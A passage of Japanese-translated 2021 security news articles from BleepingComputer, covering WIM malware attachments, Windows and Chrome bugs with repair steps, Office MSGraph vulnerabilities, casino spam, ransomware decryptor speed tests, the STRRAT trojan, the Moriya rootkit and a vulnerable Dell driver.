     「一般的ではないアーカイブ ファイル フォーマットでカプセル化されたマルウェアは、ゲートウェイとスキャナをバイパスする一般的な方法の一つである。しかしながら、この戦略はまたハードルもある。ターゲットシステムはファイルタイプを認識するか、少なくともファイルを解凍して処理できるツールを備えている必要がある」と、続けて「.IMG や .ISOディスクイメージファイルとは対照的に、WIMファイルは、ディスクイメージファイルをマウントするための組み込み機能がWindowsに用意されていない。更に、他の一般的なアーカイブユーティリティWinRARとWinZipは、WIMディスクイメージを認識しない。WIMファイルは広汎に使用されている7Zipで処理することができる」と、Loperaは発言している。
     安全なeMailゲートウェイが、未だ実行されていないのであれば、直ちにこれらの添付ファイルをブロックするだろう。しかしながら、あなたがWIM添付ファイル付きのeMailに遭遇した場合には、正当な電子メールは、このファイルフォーマットを使用しないので単純に削除しなさい。


    Windows 10 PCでMicrosoft Storeが世界中でクラッシュしている
    BleepingComputer : News>Security(2021/06/23)
     Windows 10ユーザは現在Microsoft Storeで、アプリケーションのダウンロードとインストールができず、繰り返し試みるとクラッシュする問題に遭遇している。
     Microsoft Storeからアプリケーションをダウンロードしようとすると、ユーザはロード中、あるいは、フリーズしたページを表示される。具体的には、ユーザがアプリケーションやゲームをダウンロードするために"Get"ボタンをクリックしても何も発生しない。
     様々なMicrosoft Store機能にアクセスしても、ダウンロードセクション同様に、このプログラムは回転するローディングシンボルを画面に居座らせるだけである。

    永久に続くMicrosoft Storeのローディング(画像をクリックすると拡大表示されます)

     やがては、Microsoft Storeは完全にハングし、Windowsがアクティブであれば、Task ManagerもしくはAlt+F4を使用することによってのみ閉じることができる。
     クラッシュすると、エラーメッセージがEvent Viewerに記録される。今回の場合は、Windows Storeがオペレーティングシステムと相互対話できなかったと述べている。

    Windows Storeのハングを示すEvent Viewer(画像をクリックすると拡大表示されます)

     BleepingComputerによって確認されたレポートによると、この動作不能状態は、ここ4時間以内(本記事の配信は、日本時間 2021年06月23日 14:40)に始まっている。
     この問題に関して、Windows 10累積アップデーに起因する問題でのメンテナンス作業が計画されていたのか否か、あるいは、Microsoft Azureネットワークの問題なのかは分かっていない。


    Windows 10のオプショナルアップデート機能が壊れていた、その理由
    BleepingComputer : News>Security(2021/06/13)
     Windows 10は毎度厄介な問題を抱える。今回の問題は、Windows Updateは一回に一つのオプショナルアップデートしか提供していない。
     一般的にMicrosoftは、Windows Updateによって自動的にインストールされない任意の新しいアップデートをリリースする。
     オプショナルアップデートは、新しいWindows 10の機能更新プログラム、Windows 10プレビュー累積アップデート、機能エクスペリエンスパック、オペレーティングシステムの特定のバグに向けた幾つかの定例外の修正が含まれる。
     しかしながら一年以上に渡り、Windows 10は、あなたのWindows 10用に利用できる複数のオプショナルアップデートがある場合でさえ、一回に一つのオプショナルアップデートしか提供していない。
     例えば、最近リリースされたWindows 10 21H1アップデートは、Windows Updateで優先的に扱われ、他の利用可能なオプションの更新プログラムに関係なく提供される。

    オプショナルアップデートとして提供されているWindows 10 21H1機能更新プログラム(画像をクリックすると拡大表示されます)

     今週、Microsoftは、インストールしている、あるいは、起動しているゲームからユーザを妨げるXbox Game Passバグを修正する定例外のKB5004476 Windows 10アップデートをリリースした。
     苛立たしかったことは、このアップデートをWindows 10 20H2に適用しようとした場合、私がWindows 10 21H1アップデートを最初にインストールするまで、Windows Updateが私のデバイスにこのアップデートの提供を拒否したことであった。
     Microsoftは2019年、Windows 10に新しい"Optional Update Experience"を導入した。これは、この問題を解決し、あなたがインストールしたいオプショナルアップデートの選択を可能にすると思われていた。
     この機能は、我々がWindows 10 21H1機能更新プログラムをインストールする前でさえ見事なまでに動作しなかった。以下に示すように、我々は依然としてOptional Update画面にKB5004476オプショナルアップデートを提供されていない。

    Windows 10オプショナルアップデート画面(画像をクリックすると拡大表示されます)

     オプショナルのWindows 10 21H1機能更新プログラムをインストールすると、Windows Updateは、オプショナルの新しいKB5004476定例外アップデートを我々に提供した。

    Windows 10 21H1インストール後に表示されるWindows 10 KB5004476定例外アップデート(画像をクリックすると拡大表示されます)

     BleepingComputerは、複数のデバイスでこの同じステップを試みた、結果、Windows 10は全て同じ挙動を呈した。
     これらのオプショナルアップデートの一部は、Microsoft Catalogで利用可能であるが、多くの人々はWindows Updateの手動インストールに不慣れである。
     MicrosoftがOptional Update機能で全てのオプショナルアップデート提供していない理由は定かでない。しかしながら、現在の形式では、ユーザーは実際に希望するアップデートにアクセスする前に、機能更新プログラムをインストールする必要がある。


    Microsoft OfficeのMSGraphにコード実行を導く脆弱性
    BleepingComputer : News>Security(2021/06/08)
     Microsoftは本日、Microsoft OfficeのMSGraphコンポーネント(グラフとチャートの表示を担当する)に影響する脆弱性に対するパッチをリリースするだろう。この脆弱性はターゲットにされたマシン上でコードを実行される可能性があった。
     このコンポーネントは殆どのOfficeドキュメント中に組み込まれているため、攻撃者は、特別な機能を必要とすることなく、これを使用して悪意あるペイロードを配布することができる

    レガシーコード

      CVE-2021-31939として追跡されるこのセキュリティフローは、Check Pointの研究者がMSGraph中に発見しMicrosoftに通知したセキュリティ脆弱性の大きなセットの部分である。
    この研究者がMSGraphのセキュリティフローのテストに注目した理由は、少なくとも17年前のコードが含まれていたことにあり、Microsoft Equation Editorに似たアタックサーフェス(【訳注】攻撃領域、つまり何らかの攻撃の対象となり得る領域のこと(三和コムテックより))を持っていたことにある。そして、2017年に修正されたバグは今日まで大量に悪用され続けている。

    Microsoft Ecelドキュメントに組み込まれているMSGraphエディタ(画像をクリックすると拡大表示されます)

    このバグがアイデンティファイアを最近取得したばかりなので、この脆弱性に関する詳細は現時点では不足している。しかしながら、Check Pointは本日のレポートで、CVE-2021-31939は、UseーAfter-Free(【訳注】解放後のメモリ領域を参照するダングリングポインタを悪用し任意のコードを実行する攻撃(CiNiiより))と記している。
     このタイプのフローは、プログラム オペレーション中にダイナミックメモリの不正使用で構築され、そのシステム上で任意のコード実行を導くことができるものである。
     研究者によると、この問題はMSGraphファイル構文解析機能中に存在しており、「一般的に、Excel(EXCEL.EXE), Office Online Server(EXCELCNV.EXE), Excel for OSXのような様々なMicrosoft Office製品で使用されている。」
     Check Pointの本日の公開には、Microsoft OfficeのMSGraph中に発見された他の三つのセキュリティフローが含まれている。これらの全ては先月パッチされている。
      ・ CVE-2021-31174: Microsoft Excelでの情報漏洩につながる範囲外読み取り(OOBR)の脆弱性 (重大度中)。 MSGraph、Office Online、Microsoft Excel に影響を与える
      ・ CVE-2021-31178: 情報漏洩につながる範囲外読み取り (OOBR)脆弱性(重大度中)による整数アンダーフロー(【訳注】Integer Underflowとは、結果が最小許容整数値未満になり、正しい値とは異なる値が生成されること)
      ・ CVE-2021-31179: リモートでコードが実行されるメモリ破損の脆弱性(重大度高)
    全てのフローは、ファジングによって発見された。ファジングとは、コードに様々な入力を加えてエラーやセキュリティの脆弱性を発見するテスト手法である。この方法で生成される例外には、脆弱性攻撃を導くことが可能なクラッシュやメモリリークが含まれる。
     研究者は、4つの脆弱性の全てが、ほとんどのOfficeドキュメントに埋め込まれる可能性があり、被害者が悪意のあるOfficeファイルを開くと、脆弱性がトリガーされる複数の攻撃シナリオの余地があると述べている。
     「この脆弱性が悪用された場合、攻撃者は特別に細工されたOfficeドキュメントを介して、ターゲット上で悪意あるコードを実行することができる」と、Check PointはBleepingComputerに語った。

     「全てのOfficeスイートはExcelオブジェクトを埋め込める(これは攻撃ベクトルを広げる)ので、Word, Outlook等を含む殆ど全てのOfficeソフトウェアに対して、このような攻撃を実行することを可能にしている」- Check Point

     Check Pointは2月28日に、この脆弱性をMicrosoftに通知し、そのうちの3件は先月パッチが適用された。 CVE-2021-31939は後日、追跡アイデンティファイア(ID)を受け取った。本日パッチを受け取ることが予定されている。

    注意: これらのオンラインカジノのeMailは、決して彼らの約束通りにはならない
    BleepingComputer : News>Security(2021/06/05)
     スパマーは誤解しやすいeMailで、 Raging Bull Casino, Sports and Casino, Ducky Luck, Royal Ace Casinoのようなオンラインカジノを奨励するためにアフィリエイト・プログラムを乱用している。
     大手のオンラインカジノの多くは、他のWebサイトやインフルエンサが、彼らの製品を宣伝したり、アカウントをサインアップした人々から手数料を稼ぐことを可能にするためにアフィリエイト・プログラムを活用している。
     ユーザを紹介するために、このアフィリエイトは、アフィリエイトIDを含む特別に細工されたURLを作成したり、紹介者が新しいアカウントを登録した時に、このカジノが彼らにクレジットを与えることを可能にするクッキーをドロップする。
     今週、BleepingComputerは、オンラインカジノのアフィリエイトによって実施されているオンラインキャンペーンについて告げられた。その内容は、大金の支払いが準備されている「大賞」を勝ち取ったと述べたり、あるいは、受信者がアカウントを確認する必要があるとする、誤解させるようなeMailでユーザを爆撃しているとするものであった。
     このキャンペーンについて告げられた後、我々のeMailアカウントの一つのスパムフォルダを検証することで、我々もこのスパムキャンペーンのかなりのターゲットになっていることを確認した。

    オンラインカジノスパムの定常的な流れ(画像をクリックすると拡大表示されます)

     Gmailは、eMailのこのようなタイプをスパムとしてマークする優れた仕事を実行しているが、他のフリーeMailサービスは、あなり役に立たないかもしれないので、このスパムは一般メールボックスに入る可能性がある。
     例えば、以下にRaging Bull CasinoとRoyal Ace CasinokaranoアフィリエイトスパムeMailを示す。彼らが$3,500(383,268円)の支払いを約束したり、オンラインアカウントを確認した後、ベッティングストラテジ(【訳注】ベッティングシステムとも呼ばれ、カジノなどの賭博で、どのような賭け方(ベット)をするかの戦略(Qiitaより))が共有されることを確認できる。

    Raging Bull CasinoアフィリエイトからのスパムeMail(画像をクリックすると拡大表示されます)

    Royal Ace CasinoアフィリエイトからのスパムeMail(画像をクリックすると拡大表示されます)

     このリンクをクリックすると、ユーザはアフィリエイトクッキーをドロップする別のサイトにリダイレクトされた後、このカジノにリダイレクトされる。
     以下の画像に見られるように、Raging Bull Casinoへのリダイレクトは、アフィリエイトがサインアップのクレジットを取得できるようにURLにアフィリエイトID(affid)を含んでいる。

    URLにアフィリエイトIDが付属するRaging Bull Casinoサイト(画像をクリックすると拡大表示されます)

     想像されているように、あなたが素敵な支払いを期待しているこのアカウントにサインアップしても、期待している支払いはない。代わりに、金銭を稼いでいるのは、あなたにeMailを送信したアフィリエイトだけである。
     BleepingComputerは、この記事にリストされているオンラインカジノとそれらのアフィリエイトマネージャに接触したが、回答をを受け取れなかった。
     これらの種類のeMailを受信した場合は、それらをスパムとしてマークすることでeMailプロバイダーのスパムフィルターが将来それらを認識するようにトレーニングされる。


    身代金要求型マルウェアのギャングの復号プログラムの遅さは、犠牲者に代替方法を探させている
    BleepingComputer : News>Security(2021/05/28)
     最近大きく報道された二つの身代金要求型マルウェアの犠牲者が受け取った復号プログラムは、あまりにも遅く犠牲者のネットワークを素早く復帰させるには程遠いものだった。
     最初の犠牲者はColonial Pipelineである。DarkSide身代金要求型マルウェア オペレーションによって攻撃された後、彼らは復号プログラムを得るために440万$(約 4億8300万円)の身代金を支払った。
     しかしながら、この復号プログラムは大変遅いので、この企業はバックアップからの復元に頼るほどであった。
     「ハッカーは支払いを受け取ると、無効になったコンピュータ ネットワークを復元するための復号ツールをオペレーターに提供した。このツールはあまりにも遅かったため、この企業はシステムの復元に独自のバックアップを使用し続けることになったと、この企業の取り組みに精通する関係者の一人は語った」と、Bloombergは報道している。  つい最近の犠牲者はHSE(アイルランドの保健サービス委員会)である。HSEは、Conti身代金要求型マルウェアによって攻撃されたが、身代金の支払いは拒否している。
     おそらく、攻撃者は間違えて政府機関をターゲットにしたことを認識し、この攻撃に関する復号プログラムをリリースした。
     しかしながら、この復号プログラムをテストしたところ、あまりにも遅いことが分かったので、HSEは、独自の復号プログラムを使用するために、ニュージーランドのセキュリティ企業Emsisoftと協働した。このプログラムはギャングが提供した復号プログラムに比べ2倍高速であったと主張している。

    EmsisoftのUniversal Decryptor

     Emsisoftの復号プログラムを知った後、BleepingComputerは、HSEがこの復号プログラムを使用した方法について詳細に知るためにEmsisoftのCTO Fabian Wosarに接触した。
     Wosarは、HSEとの協働に関する情報の共有は拒否したが、この身代金要求型マルウェア オペレーションがファイルを復号するにあたり酷い仕事を実行するので、Emsisoftが、Universal Decryptorを作成したと説明した。
     例えば、Ryuk身代金要求型マルウェアの復号プログラムは、大きなファイルを復号する時にデータ損壊に導く問題が知られている。同様に、Babuk Lockerの復号プログラム中のバグは、ESXiサーバを復号する時にデータロスが発生する。
     Emsisoftの復号プログラムは、データセーフティーに設計されており、ギャングの復号プログラムよりとても高速でもある。このツールは著名で評判の高いサイバーセキュリティ企業によって提供されているものなので、脅威のアクターからの復号プログラムに悪意ある挙動が有るか無いかをチェックする必要もない。

    Emsisoft復号プログラム 対 脅威のアクターの復号プログラム(画像をクリックすると拡大表示されます)

     「我々は通常日数を短縮する。その理由は、安全か否か確認するためにリバーシングする必要がない、最初にバックアップする必要もない、配備が簡単、より良いログが取れ、最終的には大変高速になる」と、WosarはBleepingComputerに話た。
     Wosarはまた、犠牲者が複数の身代金要求型マルウェアで一斉攻撃されることは前例のないことではないと述べ、そして、このことは、Emsisoftが、彼らの復号プログラムを様々な身代金要求型マルウェアファミリーからの複数の復号キーを読み込み、一度にファイルを復号できるようすることを決定した。
     「50を超える身代金要求型マルウェアファミリーとメジャーな変種が、このプログラムによってサポートされている」と、Wosarは説明している。

    Emsisoftの復号プログラムをテストする

     Wosarは、ContiとDarkSideの公に利用可能なサンプルと、今までマルウェア解析サイトで共有されてきた彼らの復号プログラムを、BleepingComputerが、彼らの復号プログラムをテストすることに同意した。
     我々のテストの一部として、使用したのはWindows 7 2CPU仮想マシン、小さな44.8GBドライブで使用済み領域35.1GBである。
     このスペックは現実に使用されるものとは大きく異なっているが、Emsisoftの復号ツールと身代金要求型マルウェアのギャングが提供する復号プログラムとの速度を比較することは可能である。
     最初のテストでは、Conti身代金要求型マルウェアで仮想マシンを暗号化した、これにはおよそ9分かかった。
     Contiが提供する復号プログラムでは、ファイルの復号に22分を要したが、Emsisoftの復号プログラムでは、脅威のアクターの復号プログラムより41%速い13分(9分速い)で、この仕事を終了させた。

    Emsisoft復号プログラムを使用してContiで暗号化されたファイルを復号中(画像をクリックすると拡大表示されます)

     次に、DarkSide身代金要求型マルウェアのサンプルで類似のテストを行った。これは、我々のデバイスを僅か6分で暗号化した。
     DarkSideの復号プログラムは、我々のテストファイルを復号するのに29分を要したが、Emsisoftの復号プログラムでは僅か18分で復号した。我々のテストにおいて、Emsisoftの復号プログラムが37%速かったが、Wosarは、もっと多くのCPUを搭載したマシンでは、もっと優れたパフォーマンスになるだろうと述べている。

    DarkSideが提供する復号プログラム(画像をクリックすると拡大表示されます)

     犠牲者は一般的に数千のデバイスと復号するための数テラバイトのデータを持っている。37%と41%速い復号速度は重要であり、リストアのプロセスを数週間とはならなくとも数日は短縮することができる。
     Emsisoftは、特定のランサムウェアを解析し、カスタマイズされた復号プログラムを作成する復元サービスには料金を請求するが、医療機関には無料でサポートを提供している。


    世界中でWindows 10のPCでGoogle Chromeがクラッシュしている。その修正方法
    BleepingComputer : News>Security(2021/05/21)
     Google Chromeが昨日、突然クラッシュし始め、世界中の多くのWindowsユーザが、このブラウザを利用できなくなっている。
     Googleは、5月10日にChrome 90.0.4430.212をリリースした。大部分に関しては、このリリースに関して昨日まで、何の問題も報告されていなかった。
     昨日の朝からWindows Leastによって最初に報告された後、ユーザは、このブラウザを使用中に、Google Chromeの拡張とタブが突然クラッシュしたことを報告し始めた。
     このクラッシュに起因して、Google subreddit(【訳注】Redditのウェブサイトで特定のトピックの議論を目的とするサブフォーラム(Weblioより))とGoogleの製品フォーラムは、この問題に遭遇した人々からの投稿で満たされ始めた。
     「15分前に突然に、Googleは動作を停止した。拡張機能はクラッシュし、全てのページ(設定などのChromeのページを含む)は読み込みを拒否した。画面はブランクになり、タブには「無題」というラベルが付けられ、その横にしかめっ面のフォルダがある」と、ユーザはRedditに昨日投稿している。

    拡張機能がクラッシュしたと述べるGoogle Chromeアラート(画像をクリックすると拡大表示されます)

     BleepingComputer自体は、このような経験はしていないが、ユーザは、Chromeがグレー画面を表示しブラウザの設定や拡張のページを開くことができないと報告している。
     更に、ユーザは、これらのクラッシュが通常モードとシークレットモードの両方で発生すると報告している。
     これは、このクラッシュがGoogle Chromeの %UserProfile%\AppData\Local\Google\Chrome\User Dataフォルダ(このブラウザのあなたのデータ、拡張、設定を格納するために使用される)の問題によって発生していると信じられている。
     Google Product Expertは、ユーザが 'User Data'フォルダのバックアップを作成し、次に、このクラッシュを修正するために以下のステップの一つを実行するように推奨している
       この問題はWindowsでのみ発生しているようなので、以下の指示を提供するが、これはオペレーティングシステム依存である。
      1. Sync(同期)データが、間違いなく https://chrome.google.com/sync に存在し、パスワードが https://passwords.google.com で表示されることを確認する(パスフレーズがある場合は表示されないが、Sync(同期)データリンクに反映されている必要がある)
      2. 開いているChromeを全て閉じる
      3. ファイル エクスプローラーを開き、%LOCALAPPDATA%\Google\Chrome\User Data に移動する
      4. ディレクトリから'Local State'ファイルを削除する(バックアップをとっていることが前提条件)
      5. Chromeを再起動する

      ただし、上記の手順で問題を解決できない場合は、以下の手順を試しなさい。
      1. ファイル エクスプローラーを開き、%LOCALAPPDATA%\Google\Chrome\User Data に移動する
      2. このディレクトリにあるすべてのもののコピーを取り、デスクトップのような場所に保存する
      3. "User Data"フォルダの名前を、User Data以外の名前に変更する
      4. Chromeを再起動する

     一部のユーザは、これらのステップを実行した後、Google Chromeがクラッシュしなくなったと報告している。
     他のユーザでは、Google Chromeを再起動したら、この問題が再び発生したと述べている。
     このクラッシュの原因は明らかになっていないが、最新のブラウザのリリース以来、Googleによって一部のユーザに対して変更が排除されたようである。
     Googleが限定的なテストだけで設定変更や新しい機能からGoogle Chromeユーザを排除するのはいつものことである。これらのテストや設定変更の一つが、大変多くのユーザによって確認されている問題を引き起こしている可能性がある。
     BleepingComputerは、このクラッシュに関する質問をするためにGoogleに接触したが、現時点で回答は得られていない。


    大規模なマルウェア キャンペーンは偽の身代金要求型マルウェアを配布している
    BleepingComputer : News>Security(2021/05/20)
     大規模なマルウェアキャンペーンは、JavaベースのSTRRATリモートアクセス トロイの木馬(RAT)を押し付けていた。このトロイの木馬は、データを盗む能力と偽の身代金要求型マルウェア攻撃の能力を持つことで知られている。
     一連のTweetで、Microsoft Security Intelligenceチームは、この「巨大なeMailキャンペーン」がセキュリティ侵害したeMailアカウントを使用して偽の身代金要求型マルウェア ペイロードを拡散した方法を概要している。
     このスパムメールは、PDF添付ファイルに見えるものを開くように受信者を誘惑している。しかし、この添付ファイルをクリックすると、代わりにRATマルウェアをダウンロードする画像である。
     「このeMailは、PDF添付ファイルを装う画像を含んでいるが、開くと、STRRATマルウェアをダウンロードする悪意あるドメインに接続する」と「このRATは、実際にファイルを暗号化することなしに、身代金要求型マルウェアのように挙動し、ファイルに .crimson 拡張子を追加する悪名高いものである」と、Microsoftは発言している。

    Microsoft提供の画像(画像をクリックすると拡大表示されます)

     Microsoft Security Intelligenceチームは、Tweetで言及しているように、STRRATマルウェアはバックグラウンドで犠牲者のデータを盗んでいる間、偽の身代金要求型マルウェア攻撃しているように設計されている。
     G DATAのマルウェア アナリストKarsten Hahnは、2020年06月に、このマルウェアはeMailキャンペーンでWindowsデバイスに感染し、VBScriptスクリプトの二つのステージを介した後に、最終的にRATペイロードを配布する悪意あるJAR(Java ARchive)パッケージを押し付けると発言している。
     STRRATはキーストロークをログし、そのオペレータが遠隔からコマンドを実行することを可能にし、eMailクライアントとブラウザ(Firefox, Internet Explorer, Chrome, Foxmail, Outlook, Thunderbirdを含む)から認証を含む機密情報を収穫することを可能にしている。
     これはまた、リモートアクセスを持つ攻撃者が、侵害されたWindowsシステムでRemote Desktop Hostのサポートを有効にするために、オープンソースRDP Wrapper Library(RDPWrap)をインストールすることで感染したマシンへのアクセスすることを提供している。

    STRRAT感染チェーン(画像をクリックすると拡大表示されます)

     しかしながら、他のRATから目立たせたことは、この身代金要求型マルウェアモジュールが、ファイルに ".crimson" 拡張子を追加するだけで、如何なるファイルも暗号化していないことである。
     これはファイルのコンテンツへのアクセスをブロックすることはないが、一部の犠牲者は、ペテンに引っ掛り、攻撃者の身代金要求に応えている可能性がある。
     「このようなファイルはダブルクリックではもはや開かないので、この恐喝が成功する恐れがある」と「Windowsはファイルの拡張子でファイルを開くための正しいプログラムを関連付けているので、もしも拡張子が削除されていると、ファイルは通常のように開かない」と、Hahnは発言している。
     Microsoftは、先週の大規模なSTRRATキャンペーンを分析しているときに発見したように、このマルウェアの開発者は、それを改善し、難読化を追加し、モジュラーアーキテクチャを拡張し続けている。
     それでも、ブラウザや電子メール クライアントの認証情報を盗んだり、リモートコマンドやPowerShellスクリプトを実行したり、被害者のキーストロークを記録したりする、このRATの主な機能は殆ど変更されていない


    最近のWindows 10アップデートはMicrosoft Teams, Outlookのログインをブロックする
    BleepingComputer : News>Security(2021/05/19)
     最近のWindows 10 1909累積アップデートは、Microsoft 365デスクトップユーザがMicrosoft Teams, Microsoft Outlook, Microsoft OneDrive for Businessへのログインを妨げている。
     ログインを試みた時、ユーザは、 "We ran into a problem. Reconnecting…"とするメッセージが表示され、このプログラムを再起動するようユーザに要請される。
     この画面はまた、下図に示すようにエラーコード80080300を画面の左下隅に表示している。

    Microsoft Teams 80080300エラー(画像をクリックすると拡大表示されます)

     この問題は、先週リリースされた2021年05月の定例アップデートの一部であるWindows 10 1909 KB5003169累積アップデートによって発生する。
     この問題を修正するために、Microsoftは、このアップデートのインストールが終了した後、もう一度Windows 10を再起動する必要があると述べている。
     「我々は、Windows Update KB5003169を適用した一部のユーザが、Microsoft Teams, Outlook, OneDrive for Businessを含む様々なMicrosoft 365デスクトップ クライアントに接続できないとするレポートを受け取っている」と、「我々の調査によると、最近配備されたWindows Updateによって明らかになったコードの問題(KB5003169で詳細に説明している)が、この問題の原因であることが判明した」と、Microoftは最近のMicrosoftアドバイザリで説明している。
     Microsoftは、彼らのテレメトリ(遠隔測定法)は、ごく僅かなパーセンテージのユーザが、Windows 10を再起動するまで、このバグによる影響を受けていることを示していると、述べている。
     Windows 10を再起動しても、この問題が解決されない場合、Microsoftが、この問題を調査している間は、 Microsoft Teams, OneDrive for Business, OutlookのWebバージョンを使用するように推奨している。


    Windows 10 KB5003173アップデートはエラー0x800f0922で失敗する。修正する方法
    BleepingComputer : News>Security(2021/05/14)
     Windows 10 KB5003173累積アップデートは、Microsoft Edgeをこれまでにアンインストールしていた場合には、0x800f0922エラーを表示してインストールに失敗する可能性がある。
     Microsoftが今週、2021年05月の定例アップデートの一部としてWindows 10 KB5003173累積アップデートをリリースした後、一部のユーザは、このアップデートをインストールできないことを発見した。
     代わりに、このアップデートをインストールした後に、0x800f0922エラーが発生し、このアップデートのインストールが妨げられたとするメッセージがWindows Updateに表示される。

    0x800f0922エラーでの失敗を表示しているWindows Update(画像をクリックすると拡大表示されます)

     BleepingComputerの読者は、Windows 10から提供されている新しいMicrosoft Edgeをこれまでにアンインストールしたユーザに関して、このアップデートに失敗するとレポートしている。
     9月以来、Microsoftは、Windows 10にこの新しいMicrosoft Edgeを強制的にインストールしてきたが、ユーザは依然として、望むのであればEdgeブラウザを手動削除することができた。
     この新しいMicrosoft Edgeをアンインストールすると、Edgeのアンインストーラは、関連する全てのファイルを削除するが、幾つかの空のフォルダを残したままにする。

    空のEdgeフォルダ(画像をクリックすると拡大表示されます)

     Windows 10 KB5003173アップデートは新しいMicrosoft Edgeを含んでおり、Edgeを再インストールするはずであるが、これらの空のフォルダが、0x800f0922アップデートを吐いてこのアップデートを失敗させる。
     このバグの修正には、Windows 10のユーザは二通りの選択肢がある。
      1.Microsoft Edgeを手動でダウンロードしインストールする。次に、Windows 10 KB5003173累積アップデートをもう一度インストールする。
      2. "C:\Program Files (x86)\Microsoft\Edge"フォルダを削除する。次に、Windows 10 KB5003173累積アップデートをもう一度インストールする。
     この二つのオプションの何方かが機能し、最新の累積アップデートは成功裏にインストールできる。


    新たなMoriyaルートキットは、Windowsシステムにバックドアを開けるためにオンライン上で使用されている
    BleepingComputer : News>Security(2021/05/06)
     未知の脅威のアクターはターゲットのWindowsシステムにバックドアを空けるためにステルス性のルートキットを使用している。これは、少なくとも2018年以降のTunnelSnakeと名付けられた進行中のスパイ キャンペーンのように見える。
     ルートキットは、オペレーティングシステムの深層に隠れることによって検出を回避するように設計された悪意あるツールである。ルートキットは、攻撃者が検出が回避されている間は、攻撃者が感染したシステムを完全に乗っ取るために使用することができる。
     以前の未知のマルウェア(オンライン上で発見されKaspersky研究者によってMoriyaと名付けられた)は、攻撃者が犠牲者のネットワークトラフィックを秘密裏にスパイし、セキュリティ侵害されたホストにコマンドを送信することを可能にする受動的バックドアである。

    異常な程こ狡いスパイ バックドア

     Moriyaは、TunnelSnakeオペレータが「Windowsカーネルのアドレス空間、オペレーティングシステムのカーネルに存在し、一般的に特権コードと信頼コードを実行するメモリ領域から」のインカミング ネットワークトラフィックを捕獲し解析することを可能にした。
     このバックドアが、コマンドアンドコントロールサーバに到達する必要なしに、犠牲者のネットワークトラフィック中に隠されているカスタムクラフトされたパケットの形式でコマンドを受け取っていた方法に、更にオペレーションのステルス性が追加された。これは、脅威のアクターの重点が検出回避にあることを示している。
     「我々は、TunnelSnakeのような大変秘密裏に行なわれているキャンペーンを確認している。このキャンペーンでは、攻撃者は可能な限りレーダーに見つからずに存在するために、ツールセットに投資し、より調整し、複雑にし、検出を困難にするための追加のステップとをとっている」と、KasperskyのGlobal Research and Analysis Teamの上級セキュリティ研究者Mark Lechtikは述べている

    Moriyaルートキット アーキテクチャ(画像をクリックすると拡大表示されます)

     Kasperskyのテレメトリ(遠隔測定装置)によると、このマルウェアは、標的を絞った攻撃で10未満のエンティティのネットワーク上に配備されていた。
     この脅威のアクターは、アジアとアフリカの外交組織やその他の著名な組織に属するバックドア化されたシステムを使用して、ネットワークを制御し検出されることなく数か月間持続した。
     この攻撃者はまた、改竄されたシステム(カスタムメイドで以前は中国語圏の攻撃者によって使用された)の攻撃後のステージの間に、追加のツール(China Chopper, BOUNCER, Termite, Earthwormを含む)を配備した。
     これは、犠牲者のネットワーク上をスキャンし新しく脆弱性のあるホストを発見した後、文字通り彼らはネットワークを移動することが可能になる。

    攻撃者が中国語圏であることを示す全ての証拠

     Kasperskyの研究者は、キャンペーンを特定の脅威アクターに帰することはできなかったが、攻撃で使用された戦術、技術、手順(TTP)と、標的となるエンティティが、攻撃者が中国語圏である可能性が高いことを示唆している。
     KasperskyのGlobal Research and Analysis Teamの上級セキュリティ研究者であるGiampaoloDedolaは、「2018年のスタンドアロン攻撃で使用された古いバージョンのMoriyaも発見した。これは、少なくとも2018年以降、この攻撃者が活動していたことを示している」と、「ターゲットのプロファイルと悪用されたツールセットは、このキャンペーンにおける攻撃者の目的が、スパイであることを示唆してるが、実際に吸い上げたデータの認知度の欠如により、この件に関しては部分的にしか証明できない」と、付け加えている
     Moriyaルートキットに関する技術的な詳細とTunnelSnakeキャンペーンに関連するセキュリティ侵害の痕跡は、Kasperskyのレポートに見出すことができる。
     10月、Kasperskyは、2つの非政府組織(NGO)に対しての2019年からの攻撃を調査しているときに、オンラインで使用された過去2番目のUEFIルートキット(MosaicRegressorとして知られる)も発見している。
     オンラインで使用されていたこれまでのUEFI Bootkitは、LoJaxとして知られており、ロシア政府系のAPT28ハッキンググループによって、合法的なLoJack盗難防止ソフトウェアに注入されていた2018年にESETによって発見されている。


    Windows DefenderのバグがWindows 10ブートドライブを数千のファイルで満たしている
    BleepingComputer : News>Security(2021/05/05)
     Windows Defenderのバグは、数千の小さなファイルを作成し、Windows 10ハードドライブで数Gバイトの保存スペースを浪費している。
     このバグは、Windows Defenderアンチウィルス エンジン1.1.18100.5に始まり、MD5ハッシュであるかのような名前の数千のファイルで、C:\ProgramData\Microsoft\Windows Defender\Scans\History\Storeフォルダを満たそうとする。

    小さなファイルで満たされたWindows Defenderフォルダ(画像をクリックすると拡大表示されます)

     BleepingComputerによって確認されたシステムでは、作成されたファイルのサイズは、600バイトから1KBを少し超える程度の範囲である。

    これらのファイルの一つのプロパティ(画像をクリックすると拡大表示されます)

     我々が検証したシステムでは、およそ1MBのファイル群で満たされていただけだったが、他のWindows 10ユーザは、彼らのシステムが数千のファイルで満たされ、或る場合では、30GBのストレージ容量が使用されていたと報告している。
     容量の少ないSSDシステムドライブ(C:)では、ストレージのかなりのスペースが不要なファイルで浪費されることが懸念される。
     この問題を最初にレポートしたDeskmodderによると、このバグは現在、最新のWindows Defender, version 1.1.18100.6で修正されている。
     Windows 10ユーザは、画面左下隅にある設定用の歯車アイコン(Settings cog icon)をクリックしAboutを選択することで、Windows Securityに移動し、Windows Defenderのバージョンをチェックすることができる。

    Windows Defenderのバージョンチェック(画像をクリックすると拡大表示されます)

     エンジンのバージョンが1.1.18100.6未満で示された場合は、Windows Updateに移動し、アップデートの確認(Check for Update)をクリックし、最新のセキュリティ インテリジェンス更新プログラム(Security Intelligence Update for Microsoft Defender Antivirus)アップデートをダウンロードしなさい。
     このアップデートが有効であれば、Windows Updateは自動的にアップデートをインストールし、Windows 10の再起動を要求することはない。


    脆弱性のあるDellドライバが数億のシステムを危険にさらしている
    BleepingComputer : News>Security(2021/05/04)
     過去12年に渡り、一般消費者用と企業用のDellコンピュータデバイスに搭載されていたドライバは、そのシステム上で特権の昇格に導く可能性のある複数の脆弱性を含んでいる。
     デスクトップ、ラップトップからタブレットに至る数億のDellコンピュータが、BIOSアップデートを介して脆弱性あるドライバを受け取ったと見積もられている。

    1つの中に5つのフロー

     まとめてCVE-2021-21551として追跡される5つのフローのコレクションは、DellマシンがBIOSアップデートプロセス中にインストールされロードされ、次の再起動時にはロードされないドライバであるDBUtil中に発見された。
